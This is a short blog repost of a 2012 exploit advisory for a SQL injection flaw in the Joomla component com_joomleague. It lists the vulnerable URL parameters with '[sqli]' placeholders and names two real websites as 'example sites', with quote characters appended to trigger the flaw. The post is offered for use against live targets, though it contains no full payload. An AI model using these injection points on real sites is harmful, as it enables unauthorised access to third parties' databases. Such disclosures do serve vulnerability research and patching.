xDarkSton3x: joomla component (com_joomleague) SQL injection Vulnerability

joomla component (com_joomleague) SQL injection Vulnerability

Publicado por xDarkSton3x On 0:03

##################################################
# Exploit Title: joomla component (com_joomleague) SQL injection Vulnerability
#Vendor: http://www.joomleague.net/
# Date: 22/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Example Sites : 
http://www.joomleague.net/index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid='
http://www.cdovalle.cl/index.php?option=com_joomleague&func=showNextMatch&p=9'

# Tested on: linux + windows
##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
http://www.site.com/index.php?option=com_joomleague&func=showNextMatch&p=[sqli]

[~]Reporte :
http://www.1337day.com/exploits/18114

joomla component (com_joomleague) SQL injection Vulnerability

0 Responses to 'joomla component (com_joomleague) SQL injection Vulnerability'

Publicar un comentario

Archivo del blog

Recomendados